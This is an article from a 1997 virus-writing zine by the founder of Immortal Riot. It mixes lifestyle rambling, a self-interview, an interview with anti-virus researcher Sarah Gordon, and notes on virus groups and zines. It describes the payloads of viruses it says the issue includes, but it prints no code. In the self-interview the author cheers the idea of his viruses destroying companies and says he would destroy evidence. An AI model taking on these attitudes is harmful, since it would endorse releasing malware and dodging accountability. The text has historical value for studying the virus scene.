Deadly serious ironic/sacrasm-ish reading and happy '97!
- The Unf rgiven
Things to do before physics
Before I continue writing I'd like to take the opportunity to mention a few things that perhaps could easymy burden.
1). Time to spill out the beans... But who wants to eat them anyways? I'm as for the moment writing &doing reserch on an article about "why viruses are written, for who they're aimed, why viruswriter'skeep on doing them, personal motivation for viruswriting, why you once started and what you findfacinating (or at least interesting) with them." So, I'd like *every* writer of computer-viruses to email meand write a little something about the above mentioned questions. If you feel like adding a few thingsthat you find interesting go ahead, let your mind go wild!
You can be anonymous if you like but don't forget to mention that! This article will hopefully (most likely)be included in our next issue of Insane Reality - IRG#9.
My email adressess are:[email protected]@[email protected]
Notice also that those system's is rather instable, but if you read (II) you know I also can be reeched onthat adress ( (II) is 9 lines below this line ).
2). Part II - Where you rather not want your daughter to be late at nights... Onhttp://www.algonet.se/~robry there are some IR & IRG files located (ir.html is the file located on thatadress btw, if that is for any use).
It's not an offical IRG page but all of IRG.SE know the homepage operator and he kindly borrowed ussome HD space. Every swedish IRG member can also be reeched on that adress - just [email protected] and he will kindly CC (that is abbreviation for _carbo-copy_ if my memory isn't totallyphucked) them to the correct person. Notice though that the official IRG-page still is located on:
http://www.geocities.com/SiliconValley/Park/9595
3). I'm just an inspiration for birth-control... My submission (other word for contribution Quantum told me;)) to VLAD-AF (Vlad-April Fool's Edition) called "IR#8" contained a little challenge - namely to crack"File Encryptor". Well, Sepultura found out the 12 byte long key which was "[email protected]" (w/o thequote-marks).
The april fool joke from me was that secret.txt never did gave out my real information nor it did containthe reasons why my handle was The Unforgiven. For those who wonder.. keep on wondering! I doubtthat it has something to do with suicide though, which some brave writer believed.
Also notice that Quantum never did hack immortal.se (since it doesn't exist), and ripped "IR8" fromthere, it was a submission to their zine from me, pretty much like this is ;). He wrote that information atthe end of the article. Well as I figured you never did read the entire faked Insane Reality #8 ;) andbelieved him. April sucka. I hope you reech the end of this one :).
Red Hot Chili Faces
Hmm, I don't quite know where to start, but I would like to comment a few personal things at this entry.
There are a few good reasons why I didn't contribute much to IRG#8 and beside being very busy withlife, university, my gf and the general irl-stuff I re-read the IR-zines and felt terrible embarrased forthem and felt like writing no more. For example, I started to write an article called "What good side-effects viruswriting can result in", but gave it up. It became too personal, abstract and complex. Andbeside this, it turned huge. A short summary of my results might still be included here or elsewheresince it's a rather interesting topic. So stay tuned.
The early Insane Reality - Insanity or Reality?
Well, both really. They're insane, yet real. I was red-phucked-up in my face and my heart went apewhile reading some articles, specially those which included stuff written about girls and politics. Andyea.. those viruses too. *Sigh*.
Also worth to mention, I wasn't too pride too see some text-strings included in my viruses or inprograms included as hex-script in some zines. (One example is "lord0.com" in IR#7 (reality.010among with basicly, the entire adventure of porno)). For those who've been harassed, I'm sorry.
Hrm, about some articles... Really, who're interested in reading about some Maria, some Ellinor, some
Anette or some other girl? Who're really interested in reading about a confused teenager opinionsabout something that he cannot express properly in english? Who really bother about a person whoramble on and on and on (like now) without giving any information, just pure junk? A real rnd_garbagegenerator, or so? However, for those who really are interested in my and my life, junk stuff, etc.paradoxal enough I won't let you down, but this time write about something that I can be proud of andstill will be proud of when I read it in let's say 3 years. However, it's still junk though. Do I never justgive up?
Current life & general hints, advises and shit
Current life is cool. I study and spend most of my spare time with my close friends or with my gf (namewon't be mentioned) who I've been togheter with about half a year (so far).
Hints in life is have plenty of sex. If you consider yourself too busy or "too of something else.. " changeopinions. Nothing is as relaxing as it. It's though not good to became a "sex-addict", since mostaddictive things is bad for you, sex being the exception as long you have semi-control over it (havingsex with yourself w/masturbating 5 times a day isn't the way to go). Not only is sex great but to reallycare about someone rocks. Don't let your life miss this.
If you smoke just give it up. It smells bad and it won't do any good for you. Smoking at parties is alrightbut it doesn't really impress on most ladies. Socially smoking is great, but socially being decently drunkis also a killer, so.... it isn't perhaps the best way to deal with things'n'shit anyways.
Alcohol. ch3-ch2-oh. This rocks. Don't be sober too damn often. Home made whine can rock (andbeside it's cheap, it's a good hobby...).
Astronomy. Really interesting and is a great thing to discuss, philosophy and crapp on about after a fewbeers. Only a few things can be described as complex or simply as this.
Driving-license. Freedom costs. But damnit, it's worth it.
Cooking. Everyone likes to eat, be sure you can do magic in the kitchen. Don't rely upon girls to do thisfor you. Not being dependant on other persons is essential in life. I only wish I could describe mysituation as "not being.. ". Bah, isn't money to key to everything? (yes, that might as well include ther@@t of evil, too)
One Half. A really good virus, lack bugs and contain a really cruel original payload. This issue includesthe original source code.
Suede - Coming Up. A really cool album, maybe the best album any U.K band ever produced.Sgt.Pepper from Beatles might just be up there.
Ford Fairlaine. "Eih.. I fucked him!". Great fucking movie if you ask me. Up there along with EddieMurphy's RAW.
Hotmail. Well, any anonymous mail-system is great if you feel like giving your teacher some soft offeedback (critism can be kind of sensitive, just trust me..). Http://www.hotmail.com. A cool rerouter canbe found on http://www.starmail.com ([email protected] is one of those catchy phrases..).
Burger King. Just so much better than fucking McDonald's. Not a good place to work on I guess but forlunch (not date-dinner though!), it's more than OK.
AVP anti-virus. Love the demo-section. The scanning/cleaning capabilities is also really impressive.Along with its code-analyser. If only it would ran a little bit faster on my machine.
Java, html and high level languages. Well, assembler is cool, but I sincerly doubt it will get you anywealthy. Internet and its applications is what brings you money. Developing things fast is whatcompanies want you to do.
Irc. If used properly (i.e. not sitting there wastening all your spare time) irc can be as good as a scrinkdepending on which people you have a conversation with.
Money. I have stated that greed is your worst enemy, so watch out. Money tend to change things,beware so it won't mess you up. Might just solve your problems better than booze. Booze solve thingsby its nature ;), problems is not included though.
Drugs. If you're afraid to face the reality, change your situation, don't flee from it with drugs, computers,
irc and shit like that. If you can control your use, it will sooner or later turn into abuse and you shouldgive it up asap.
Clifton Classic clothes. A sleep-over, black jeans (or ordinary Docker's if you prefer that) combined withSweet Georgia Brown hair pomade looks nothing but great.
Insane Reality. For whoever find low-level assembly programming and virus-related things interestedthis is zine to get ;). Hehe, just had to mention this.
love. If you don't find someone else to love that loves you back, be sure to love yourself. It's great tohave a massive, yet humble ego.
Studies. Can be quite hard. Compared to life and work it's though not as hard as you once believed.
Isaac Asimov. Truely a smart writer. The books about the "Foundation" and "robots" are good andcleverly written. Something useful to waste your time with and might just get you interested inastronomy.
Acqua Di Gio Giorgio Armani. Going around stinking bloody Farenheit or some other highly commoneau de toilette or after shave always manages to upset someone. Be original and expensive in yourchoice of scent.
Coffey. Keep your awake during studies, during hacking, during coding. Sleeping is such a waste oftime, really.
Oxygen. Can't really without it, however some early viruses early in the world's timeline could.
Overrated things
Hitchhiker's guide to Galaxy. Isn't all that great, really. Has a few points, but not worth 900 pages.
Windows/95. Everyone know this OS sucks, howcome everyone is using it?
Swedish chicks. They aren't all that neat. The majority is just plain trash most of the rest is average. Aminority is something to have in the long run. Of course, one doesn't realise this on a 1-2 week longvacation.
Sleeping. Everyone likes this and it's essential it's said. But, really, it is like wastening a 1/3 of your lifewith.
Opinions. Who will listen to you anyways? Who need goddamn opinions? Why are you even readingmine?
Technology. Science should be fiction/not truth, dreams/not reality and so on.
Neuromancer. Another book not worthy its reputation. William Gibson just ain't no good author.
Action movies. Do I have to comment this?
Satisfying one's ego
Here's an interview I filled out for Richard Loearker's book. It will be an anti-virus reserach book and Ido encourage every viruswriter to erase my answers, fill in your answers yourself and send it [email protected]. If you want to add more questions to it, that is fine, too.
I know this is lame, egoistic to include an interview with yourself, but this ain't no popularity contest. Dome your worst. Personally, everything I've ever written is horrible this piece - I see as the exception (i.e.the interview) but that might just change if I re-read it in a year. Well.. most things tend to change.
What is your handle?
My handle is The Unforgiven.
How did you get your handle?
I found the handle on one of Metallica's albums and decided to take it. I liked the song and thealias did somewhat fit my person. I don't know exactly why, but metal-music has in a way or two alwaysinspired viruswriters so it seemed to be a natural handle to occupy.
How old/young are you? (Approx. If you won't want to be specific)
I'm 21 years old.
Would you dare to give me your first real name? (Do if you want to, don't if you don't want to)
Sure, that would be no problem ;-).
How would you describe yourself?
I prefer not to since your readers would probably think of me as some sort of bragger. Ah well, Ithink I'm a pretty ordinary young adult who is a part-time enjoyer of life.As for the moment I'm studying on Chalmers University of Technology located in Gothenburg(Sweden), and will hopefully be for quite some time. I've worked with various things during the previousyear, among many things computer-security. Although I liked my job I decided to get back to schoolafter a moment of clarity.Socially I'm really not very complicated. I live a healthy social life with really good friends and with mygirlfriend who's always there for me. I believe I'm very spoild concerning this kind of things.
How do your friends and people around see you like? (BE HONEST! ;-)
I am not a mindreader, but I do however believe that most people have little or no trouble with myhumble person. Of course, there is always exceptions and honestly I don't deserve to be liked byeveryone. Hopefully all that is in the past, but who knows? Cruelness is one mean habit to kick. It justwon't walk away all that easy.I always try to care for persons who care for me and I'm always interested in getting to know newpersons. Maybe are those the reasons why people accept me for who I am.
Since when did you get involved with virus writing and how did you became interested in the first
place?
I became interested in viruswriting somewhere back in 1993. Me and a friend started ImmortalRiot - mainly a viruswriting group, and I had to start to learn assembly.
Since when did you get involved in a virus authoring group?
When I started the group, of course.
What made you decide to join this group?
I didn't join Immortal Riot, I created it. I don't though know exactly why I formed yet anotherviruswriting group, but it seemed like a great fun and I tried it out.
How did this group get its name?
I don't have a clue. It did sound cool.
What are the reasons for you writing viruses?
I'm totally clueless! There aren't many good reasons really, but viruses facinated me and I wantedto learn more about them. The best way to learn more about viruses is to write them and so I did.
What is the main purpose of the group?
To write new good undetectable viruses, supply the masses with virus related information andknowledge for whoever it may concern.One of our goals in the beginning was to learn the shit ourself and teach echother the knowledgeachieved. Ah well, mainly the purpose of a viruswriting group is individual. I doubt we had any specificpurpose really, mainly it was just a fun thing to waste your time with.
Approximately, how many viruses have you written?
I couldn't count all updates, new versions and so forth. The viruses released in the wild and whichhas infected computers around the globe might be around 30.
Which viruses were a real challenge for you? (Masterpiece?)
When I finally got the knowledge to write some good virus I got unmotivated and grew bored withit. Mainly I wrote viruses whenever I felt like tormenting some computer geeks or when I was reallyupset about something. Nowadays, I've calmed down or maybe I just got better things to do with mylife? Who knows, I might give it another shot, sometime.
Have you written any virus toolkit or add-on?
No, I don't think so.
Why have you written this toolkit or add-on?
..
What kind of reactions did that program get?
..
What's your attitude towards antivirus researchers and why?
I've no problem with most of the guys "on the other side" and most of them do deserve somerespect. Some of them have though some serious attitude problems with viruswriters, but honestly Icouldn't care less about them. Some persons have problems with everything and this just ain't myburden.
Give me some opinions about and his product. If possible, motivate.
... Frans Veldman (Thunderbyte Scan)
Frans Veldman is a really good low-level programmer and TBAV is a technical excellent product.
... Dr. Alan Solomon (Dr. Solomons Antivirus Toolkit)
I believe Dr.Solly has a huge identity crise or just heaps of problems with his very own person. I
havn't looked closely into his product, but he ain't programming on it himself so it can be good. ... Fridrik Skulason (F-Prot)
I like Frisk a lot! His product is excellent and I recomment F-Prot for everyone who are looking foran anti-virus program. Fridrik himself is a very nice person and he's also a lot like "us" but older. Heonce stated in an email to me saying "viruswriters are a lot like me 15 years ago,", I like him for beinghonest.Also notice the comma in the quote before the quotation mark ends. Well, let's just say I'm trying to actas a reporter.
... Eugene Kaspersky (AVP)
AVP is a good product, too. I don't know very much about Eugene but I want to believe he's nice.
... others you would like to give your opinion about? (ME? Naaahh)
Nah, I wouldn't waste my time to write anything about John Mcafee since everyone knows hisproduct (Scan) sucks bigtime and he's a fake.
What is the best line of defence against computerviruses and how would you implement it?
To remove all floppy and harddrives and never copy anything? :-). Honestly I don't quite know. Nosystem is 100% safe against virus attacks.Personally I like resident monitors and recommend other persons to use them if they're afraid to get avirus (I believe the TSR monitor called F-Prot Gatekeeper is a good choice). Some sort of scanningsoftware is also good to execute once in a while..
Would you like to work for an antivirus company as researcher/troubleshooter? Why or why not?
I would have no problems with that. Would be quite ironic and I couldn't say I wouldn't like itbefore I had tried it out.
If someone turns to you for help when his computer has a virus, would you help him? Pleasemotivate why or why not.
Sure I would. That would perhaps increase my knowledge about these little things and on thesame time I would get the other persons respect. I've done this several times during the past years.
Would you ask money for your help?
Of course not. I dislike greed.
If it turns out to be a virus you have written, what would you do?
This too has happend :-). I gave out all technical details about the virus (trust me, they got reallyimpressed) and wrote a cleaner for it. Voila! Respect earned in a cheap way!
Would you still ask money for your help?
I wouldn't in the first case, so... No, I wouldn't. But I would offer them the source code (claimed
disasm :)) for further investigations.
What would your initial response be if you see a newspaper that describes your virus wreakinghavoc in:
A government agency?
First I would first laugh my underpants off, but then I would be a little bit worried about it. Myhandle/real identity is pretty known afterall so this could get me busted. I think I would destroy allevidence so they couldn't prove shits.
A hospital?
That depends. I wouldn't like to see someone getting hurt physically by a virus of mine but if it justhad infected some of their computers or trashed some easy to recover data I'd have no worries with it.Of course this is bad publicity, but I can live with that.
A large company?
Yummie! I like all daily newspaper reports concerning companies getting hit or (prefered) wipedout by a virus of mine. I would be happy a day or two then I would forget all about it.
A small company?
I couldn't care to discriminate between large or small company. Of course I would like this too.
What would your initial response be if this company went broke due to your virus?
I would silently say "Woops, better not trust computers, geek." and get paranoid about theconsequenses. Surely, they would want someone hanged.
What would your initial response be if someone dies in the hospital due to your virus?
Shit!Really I wouldn't like this to happen. I'm not a weirdo. I would probably think about this a lot and afterquite some time come to the conclusion that it was all an accident and not, - not even indirectly - myfault. Then I would try to forget all about it and blame the dead vegetable on someone else.
What would your initial response be if the government loses all police arrest records due to yourvirus?
Voila!This I would indeed like. But then again, they wouldn't report this and just restore the records frombackup's. If they had no backup I would thing twice about the effects this kind of incident may bring andget really paranoid.
How is the law in your country concerning computer viruses and what is your opinion about it.
The law is a complete mess.I can understand if deliberate spreading of computer viruses is considered a crime in some countries,but writing? No way! And how easy is it to prove that I deliberate did spread a virus?Most laws about viruswriting has a large amounts of flaws. Surely, with a good lawyer you will get awaywith it. Sweden hasn't for the moment any specific law which forbids this.
Have you ever been arrested for doing illegal things with computer (viruses, phreaking, hacking)? No. I have never been arrested for anything. Aren't I too legal? :-).
Has this arrest altered your view of these activities, and, if so, please describe the stage you wentthrough.
..
Would or do you write antivirus software?
No I wouldn't. I couldn't make money outta it anyways and just writing one for fun is a waste withmy ever decreasing amount of spare time.I have though written cleaners against viruses reported in the wild. It's for no use to have a productdetecting 10.000 viruses which aren't a real treat.
If so, what kind of software has your main interest?
TSR-blockers, scanners & cleaners.
What would you like to say to antivirus persons if you have the chance?
"Hello". Which is a good first word to start a conversation with.
What would you like to say to new virus writers that are getting in the scene?
It's not really worth it and maybe it's only a waste of time for everyone. In the end nothing whatyou are doing now counts. Find something better to do and get on with your life without the scene. Itwon't do shit for you.
What are you planning to do in the future with the knowledge you have now about viruses?
Frankly said I don't quite know. I had use for the knowledge gained from the scene and fromfriends in the scene. However I would like to believe that you have use for anything you ever learn, soit's not really such a big deal afterall.I'm as for the moment writing an article about what good side-effects viruswriting may have (onpersonal basis), but as for anything concerning the future, you just don't know.
Do you think that writing viruses was a good descision for you to take? Please motivate why Yesor No.
I wouldn't know. I could impossible know what would or could have happend if I didn't. I only knowmy situation as for now, but sure I like my current life.PS: This interview will be put in a dutch antivirus book.
AV interview
Here comes an interview with Sarah Gordon (all you surely know her). She can be reached at [email protected]. Here it follows anyways, enjoy!
First of all, i would like you to give me a personal character presentation about yourself with yourown words. then, secondly, (be honest), i would you to write how you think other people around you,see you as.
Personally, i try just to be honest, thorough, compassionate, and loving person. i try to not makejudgements or draw conclusions without thinking them through, and i try to be fair. (note: i did not say idont make judgements or draw conclusions. i said i try to think them thru and be fair. i see nothingwrong with a person saying 'i like or dont like this or that and here is why', or 'this or that is wrong, hereis why'. i am not very good 'game player', and usually just say what i think. since sometimes what i thinkmay change, this can be a problem :)
my priorities in my personal life are relationship to God, to my husband (i was recently married as youmay know), to my children (who are grown), to my friends, and then to my work. at least, in theory thisis the case. how i see myself?..hmm, well, i try to adhere to what i think is important, but i do not alwayssucceed.
how others see me, well, you would have to ask them :). but i think sometimes some people have pre-conceived ideas, or want someone to fit a certain mold they are comfortable with....so they put methere. when they do actually take the time to know me, they often find out they were wrong. i think alsothis happens with many people, not just me. (it could be they find out they were right :)
yet others, usually those who are professionally competent and secure, don't have these problems --they see the bigger picture and have no need to create artificial life-model of another person :) (no punintended).
i am told that i have no sense of humour and that i see things 'differently', whether or not this is abenefit is an exercise left to the reader.
about your articles, what gives you motivation to write them?
well, i write different kinds of articles, and the motivation is different for different ones, at differenttimes.
i write about something if it interests me, and if i think i may have some idea someone else may nothave thought of. or if i see something written i dont agree with.
i have written several for money, but they are usually technical security articles, nothing to do withviruses or virus writers, or any of that. sometimes it is nice to deal with 'non-people' issues, there is alot less room for 'controversy' :)
and/or the virus-community with your write-ups? (if yes, motivate what.. ).
sure, some have changed. i mean, now they are talking to each other instead of just namecalling. i think i played some role in that. well, i know i played some role in that. but my 'role' was just toinitiate change, as some form of catylst. don't you know, usually the catalyst gets burned the most :)
there is now more examination of facts, instead of hype and hysteria, related to virus writers. i know i
played some role in that. all in all this examination is good, for both sides of the discussion.
i think virus writers are now thinking and talking more about what they are doing and want to do, andrealising the impacts of releasing their creations. im told i have had some role in that. but i dont know. ihope i did. but it could be natural sequence of events. maybe i just recorded/documented it. maybe imade some change by doing that...i don't know. i know personally i have had some impact in theoverall dynamic, but how much and how to measure is difficult.
many times now im quoted about what ive learned by just talking to people and analysing facts abouthow viruses really spread. hopefully this has some effect on getting the media to focus on realproblems.
but virus writers and things related to them are just small portion of my work. ive done more in producttesting, certification and network security. however, it is the 'virus writer' work which seems to grabsome attention.
something you have written/worked about that has been misunderstood?
sure, this is always the case with everyone isnt it? havent you? :)
in particular, i remember when phrack wrote some story which they later said 'we're sorry, we didntcheck this out thoroughly' about my trying to shut down some bbs. its true i was in a room whensomeone suggested that some bbs should be closed, but if i remember correctly, i suggested this is nota very good idea...
then, there was that ugly silliness the virus writer kohntark made up. i never did figure out why he didthat, but he seemed to have some stuff works, just like it is cool to know about other computer actionsand who can argue with you? not me. but there is no 'magic' or technological 'excellence' in this stuff. itsnot 'new science'. its not any way to get a good job. what it can be is some very costly pasttime. therecan be a big price to pay -- you can really hurt someone with the viruses, because you can notguarantee that you can control the viruses.
people will say you cant *really* hurt anyone, but they are wrong. so please stop and think what youare doing. if you are the kind of guy who wants to hurt them, then you deserve what you may get if youdo it.
[how many words was that?]
about your article "the generic viruswriter", the four persons you selected for the four groups, whowere they? (if you can't give this out, don't, but motivate why.. ).
sorry but that is confidential to them. why? i told them it will be confidential unless they tell meotherwise when i asked for people to respond to the survey.
which virus-related article is your personal favorite? (why is that..).
general systems theoretical model for av protection (if you mean my own). it is favorite because itallowed me to work in new area. or do you mean in general?
what, concerning virus-related stuff have you regretted in your life?
i regret that i did not realise the personal dynamics of my relationship with the virus writer formerlyknown as dark avenger, and that i was sometimes too concerned with my personal life to give attentionto him when he needed it. but it was really wearing me out, and i actually got physically ill fromspending too much time with all the work. i did not realise the impact this all would have on him, or onme. it took alot of my time and attention for several years.
i have written a lot about how we dont realise the impact of our actions on others, since the computerscan tend to desensitize us. unfortunately, i was not 'immune' to this .
do you prefer tea or coffee in the morning?
grape kool-aid (dont you attend defcon? :)
your favorite dish?
prawn crackers, any hot chinese dish with chicken.
what're your hobbies? (umm.. one hobby.. many hobbies??).
hobbies? i think you need spare time to have those.. i used to sail and did at one time train andride my own horse, but i had to give him away when i could not afford to keep him. i also dont have mysunfish sailboat anymore. i have recently tried to do some oil painting, but lost interest in it. i guess idont really have any hobbies.
do you?
who did you vote for in the president election - 96?
i did not vote.
do you think the "virus-infections-problems" will die out and fade away with the OSes gettingmore common, dos losing ground, etc? and in how long time if yes..
i think this depends on how you define 'problems' :)
you sell f-prot professional, what other av-products would you recommend for the average user?
the 'best' product for any job depends on the needs of the user as well as the product. anyproduct which is wildlist compliant is a good 'starting place' for the user. from there, he will need tofactor in his individual needs.
about f-prot pro & not-registrated, what are the differences?
i have did a comparison for the Command web site...you can see the differences there! (can youtell i'm getting tired? :)
how does your typical monday-friday day look like? (are you satisfied with your current life?).
get up. drink kool-aid. (ok, coffee:). log-on while drinking coffee. answer mail. answer questionsabout viruses :). answer more questions about viruses :). (answer this mail). look at viruses :). look atmore viruses :). try to spend some time researching new topics. answer more questions about and look
at more viruses (usually macro viruses).
am i satisfied? no. are you?
what plans (irl/computer) do you have for the future?
irl, i want to buy a house and a dog :) have a garden and volunteer some time someplacemeaningful.
for computer, i am thinking maybe ill write some new software, maybe automate some tests which takea lot of my time now, and probably design a new CSecurity model.
do you prefer a dog or a cat? (not for dinner.. pet :)).
hey, how did you guess? i have a cat but he lives with my friend. i could not bring him to florida.he loved his house too much. so now i dont have any pet. but hope to have both.
well ..since i wrote this, i have bought another dog, he is not yet named, and is still at the pet store ..buti will be bringing him home soon.
[since i wrote this (yet another edit :)), the dog from the pet store got sick. so we got yet another dog.our third. this one we named 'lucky'. i hope he is :)]
about viruswriting groups, a lot of us has faded out and died recently, anything you want to say tothem or to the one's that still remains?
i'd be interested to talk to anyone who wants to talk seriously about viruses.
do you consider viruswriting to be a perverted hobby?
never did. waste of time. probably unethical from a formalised ethical modeling point of view (ifyou're Kantian :). can be illegal. but perverted? thats funny :) . have you seen the Internet lately?
lets keep things in perspective. i work hard to help users avoid problems from viruses, and feel peopleneed to take active steps to help stop virus distribution. im against indiscriminate virus distribution, andthink that as a society we should not overtly or tacitly condone it.
but there are far worse problems facing our society. this is not to say viruses are 'no problem'. theysure are! but in the 'big picture' there are far worse problems facing computer users and society ingeneral than the viruses we are seeing today.
it is the viruses which i have chosen to fight, and i wont stop fighting against them because it is wrongto make software which hurts people or which has the potential to hurt people. computers should beused for helping people, used for good ethical purposes. now, can you and i talk about why you writeviruses and distribute them in your magazine? because i think it is wrong. you can argue that whatpeople decide to do with them is their own business and not your fault, but actually if you didnt givethem the viruses, you wouldnt have a role in their using them for bad.
as it stands now, you are partly responsible for what they do with what they do with your creation. whynot create something which uses the computer to help people, something they can chose to use andthank you for instead?
IRL papers
I've seen a lot of write-up's concerning computer-viruses lately but since they're all in swedish and mebeing a bad translator I'm sorry I didn't translate them all for you.If you know some swedish though the page to be on is: http://www.qainfo.se/artiklar_om_virus.htm (or.html dunno).
One article called "Virus Buster" is located on http://www.idg.se/cs/artiklar/1996/77/cspe/b10a/b10a.htm(or .html dunno) which's featuring a picture of Klas (S&S Sweden) Sch”ldstr”m "which makes life hardfor those who got the idea to create and distribute computer viruses" (He's defintitly geeky looking,check for yourself!).
Some quote's from that articles (published in Computer Sweden #77, Friday the 6 of Dec, 1996) followthough (scene-person related, go bitch on him or so..) here.
"Last spring, the virus Boza came, that was the first virus for Win/95. But it sucked. It can only infectfiles in the same directory from where it was executed from and it fails doing it sometimes. It wasthough a media-hype (or PR-trick) from the virus-authors to be first with a 32-bits-virus".
(Now, he also diss the hare virus claiming it's only halts the computer and that he consider macro-viruses the real danger..).
Furthermore, they write (which could be interesting in this zine ;)).
"Klas consider a virus named One-Half to be among the most naughty one's he's ever seen. - At theoccations I've seen a virus spread itself to many computers at one time, it's one-half, he says. "It'smade hard to detect and has no bugs. It places itself on the "partition-sector" (direct-translation -tu) andslowly starts to encrypt the harddrive. When half of the hd is encrypted the message "Dis is one half.Press any key to continue" is displayed and at that time, also back-up's is encrypted.
(Klas starts his sector-editor (which he wrote himself%!) and takes us a journey trough One Half and itsfunctions.. w-o-w- ;)).
(Now, he says we're all kids who seems to love computers, yet are trying to fuck them up and therebyare really hating them..)
.SE 10 top wild list Junkie.1027 (boot/file) Form.a (bootvirus)
Antiexe (bootvirus) Beijing (bootvirus) AntiCMOS (bootvirus) Grangrave.1150 (filevirus (Burglar/H I wrote av against btw! - tu :)) One-Half (boot/file) WM.Concept (macro-virus) Empire Monkey (bootvirus) Ripper (bootvirus)
Well.. In case you're interested!
Horror
Since I forgot to include this code in the VLAD april fool's edition, here follow [Push-Up] (v. early beta!)written ages and ages ago by someone who surely indeed will turn red-hot-chily-red when seeing this;).
The code is as unoptimized as can be ;) and there are labels and check's w/o corresponding code :-).Double-code inclusion is included for your own sake! You -should- be able to optimize this and feel likean asm-wiz!
As shitty old tradition we supply you with un-finished viruses for you to modify and claim your very owncreation!
Also, as we say in Sweden "a laugh extends your life", so... I guess you'll be like really old after lookingclosely into this one.
Anyways the basic thought for this virus was good since I consider a bs/mbr/com/exe semi-stealth virusan alright replicator. The virus should work, but I guess that's about it, probably not perfectly under allconfigurations and stuff.
Gimme more cheese please
This virus is *really really* old and is for me hysterical funny to look on. If the author of it who wrote it93/1994 remembers it, please write me an email! (I hope/think/believe you don't mind it being included
here ;)).It lack some byte optimizing but the overall quality is though alright concerning the coding style. (Now, Ican nag on this, when I recieved it I didn't understand anything and the author teased me like shit ;)).Well, it's a resident COM infector w/o any other functions or payloads, works really good on mymachine.
Eugene K
Well, I'm a big fan of AVP and its grafical section of viruses so here follow a gfx payload which is a sortof "remake" of a fire effect. Finally Eugene did include (what he called) "Riot.ir8" (a virus with a gfxeffect) and just to see if he will include the virus below too. The virus follow as hex-script below this veryslow effect named GrayNuclearSky. Don't enjoy.
The LifeWire virus
About a 220 byte .exe overwriter ;) of EXE-files which F-prot doesn't detect due to unknown reasons. Ithas two activation routines, one grafical and one standard which itself claim to have some self-modifying-code along with some nifty TSR routine. Of course that routine is a damn liar. The first onewill blow the second of november any year from 1997 (RTM Worm day). The second one will 'go off' onrandom basis. This virus wasn't ment to be a serious virus, simple a demo-virus (haha) for the demo-routine above. Further more the text-strings
"[LiveWire GFX] ""Hiya, Robert.. !"
is visible in trojanized files.
Side-effects the conversation way
This was suppose to be a short summery of what good side effects viruswriting might have. I can'texactly say what you consider being a positive effect of something, but most stuff thought of is negativewhich of course leads us to a position where it's hard to motivate viruswriting. This mean that this is animportant issue to deal with if some of your irl 'friends' all sudden start wondering why the fuck you'redoing it and you have'll to defend your rights.
Well, you probably have thought about a few good reasons yourself, if you need reasons that is. I said Icouldnt give any good reasons to viruswriting stated in the interview published above ;).. Hm, that isdefinitly to simplify it, but it's for a time a fun thing to do.
Fun? Is it fun to write something with evil intension? Is it fun to make a bomb?
Well, bombs are interesting, but please don't compare those things. When I said "fun", I ment"interesting". Yes, it is interesting to program things. It's interesting to develop code with an uniquecapability - to self-replicate. It's interesting to meet other people similar yourself and it's interesting andfun to see other people solution and learn from them. The coding itself is just a must to be accepted bythe people who I talk with.
But why viruses?
Well, do you find any other programs that has the same impact on users than viruses? It's fun toknow much about something that not too many people know much about.
So.. it's all about having respect then?
No, it's not. I won't discuss this with most people, only with those who're concerned. Plus, I likehaving knowledge if some smartass need to be "taken care of", but since I dislike physical violence, Ifind my computer skills somewhat useful.
So, then you distribute your code to people you dislike?
No. I didn't say you did now did I?
Defence is easy. Just bore them to death and voila, you'll win. The conversation above *was* boringand due to that, I won't write anymore on it. The conversation above wasn't about side-effects at all.Gotcha. As stated somewhere, stay tuned and it will be presented. Not here though. Ha-Ha.
Scene-Zines.
Recently, I've seen a lot of zines/groups popping up and while some has faded away. Well, some saythe scene is dying but I think not. Only the "good old virus groups" are. Rabid is dead (hehe!), P/S is,NuKE is RIP, YAM, TridenT, DY, VG and so on are (Not much of news, most people don't even knowabout some jam ;)) but! there's 'always' new groups coming up some who're really good.. and yea..Immortal Riot is still around and will be for quite some time.. Don't expect a fade out!
The funny thing with virus-groups is that we do release a shitload of zines. A short summary of thescene-zines might be in order here (If I've forgotten one or two.. that is only because I'm tired, but sinceI dislike to sleep... deal with it)
40hex
What I heard P/S died and won't put out any more 40hex issues. Well, most 40hex zines did includethings one still can look on and learn from so if you miss them, re-read and study an old one :).
VLAD
It's sad Qark and Quantum gave the entire virus-thing up, but we'll see what Darkman (who have beenoutta it recently) can do with it. I miss them ;) seeing my name appear in the greetings to each issue(hehe!) and those games included. After metabolis gave up vlad they lost a little of their "personality".Qark was very good as organiser, too bad (for us) he got tired of it and desided to drop the entire thing.Good luck in life guys!
INSANE REALITY:
After our merge with Genesis we finally brought out an issue and in my opinion a very interesting issue,too. Beside the overall code-quality (maybe too high for most) it included a lot of other good non-codingmaterial. Thanks are due to Dark Fiber for doing a lot of work for us!
Also worth to mention is that Sepultura and Rajaat put a lot of effort in doing it as good as possible. Iheard people complained and gave us negative feedback, yet I can't understand why.
There isn't much news in IRG (what I know of anyways) issue#9 is under development and you can ifyou consider yourself worthy contribute to it. Expect to see a high quality issue!
29#A
Vlad-stylish group from Spain(?) I wish good luck in the future. Had some interesting things in issue #1and we can always hope it remains stable and evolve.
Computa-Gangsta
Issue #1 isn't really worth bitching on here. But, it's a first issue and I won't bitch on newcomers. We allstarted somewhere...
STEALTH.
Does contain a lot of complex & interesting stuff. Maybe better commented viruses would increase the"overall quality" though. From russia with love :).
PLASMA
DC is gone. Might have formed another group called RSA. Can be interesting to see what Wild Workerand co. can do with his crew (RSA). (I know he wasn't "pres" but he should be).
SVL
Good luck guys! I surely will enjoy reading this zine! It's quality (besides this article!) poeple expectfrom you. Hope there will be a issue #2!
Actually, this zine is not a SVL's one, moreover, it is not a group mag at all. Aditionally, we would like tostay an intergroup zine :) ]
NuKE
Has been dead for several years now, still there is some newbee's on irc asking for VCL2. Don't dothat, it's annoying as hell and you'll most likely be kicked or banned two seconds after you pressedenter. So read my lips: NuKE is dead!
iKX
Seems to be an interesting group, including b0z0 and guys. They did contribute to Insane Reality #8and Sailor Moon is an interesting virus.
Minotaurus
Dunno if the spelling is correct or not ;). They should though write their stuff in english if they're around(haven't seen much lately though).
So.. there's actually a shitload of groups out there, producing code. Hang around long enough on irc#virus and you'll see them sometime.
Greets
There's so many people to greet really. I would like to thank everyone who have been there for me, onthe irc, on email and on the phone. Further greets goes to anyone who won't take this contribution anyseriously. I promised to include something and I try to keep my promises. ok?
Thanks to all I ever have done a /msg to, and yea.. IRG guys.. keep it up!
Credits
The Unforgiven. - Main article writer.
Well, that's it (if not specified somewhere else).
Goodbye's and cya somewhere.. somehow.
Vlad.Au. Keep on emailing me.
